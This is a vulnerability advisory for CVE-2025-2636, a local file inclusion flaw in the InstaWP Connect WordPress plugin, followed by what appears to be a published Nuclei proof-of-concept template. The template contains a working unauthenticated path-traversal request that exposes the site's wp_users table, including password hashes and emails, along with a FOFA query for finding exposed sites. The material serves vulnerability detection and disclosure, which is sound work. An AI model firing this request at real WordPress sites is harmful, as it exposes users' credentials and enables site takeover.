The InstaWP Connect - 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.
PoC代码[已公开]
id: CVE-2025-2636
info:
name: InstaWP Connect < 0.1.0.86 - Local PHP File Inclusion
author: iamnoooob,pdresearch
severity: high
description: |
The InstaWP Connect - 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files.
remediation: |
Update InstaWP Connect plugin to version 0.1.0.86 or later.
reference:
- https://wpscan.com/vulnerability/d1b64725-d4ae-4d73-950a-b772a877022b/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4c8f2c6f-c231-477c-895b-df892569ef95
- https://nvd.nist.gov/vuln/detail/CVE-2025-2636
classification:
epss-score: 0.13543
epss-percentile: 0.93966
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-2636
cwe-id: CWE-22
metadata:
max-request: 1
verified: true
fofa-query: body="/wp-content/plugins/instawp-connect"
tags: cve,cve2025,wp,wordpress,wp-plugin,instawp-connect,lfi,vkev,vuln
http:
- raw:
- |
GET /?instawp-database-manager=/../../../%2e%2fmigrate%2ftemplates%2fdebug%2fdb-table&table_name=wp_users--%20- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'instawp-wrap'
- 'user_pass</th>'
- 'user_email</th>'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402200cbc0552c660b66b941494fab2336935ea38988d17e52a707b4e9fadb2044b0902203caa8a913e68b689b4185ed95dc62727847702fe9aec6468287aa704a250755c:922c64590222798bb761d5b6d8e72950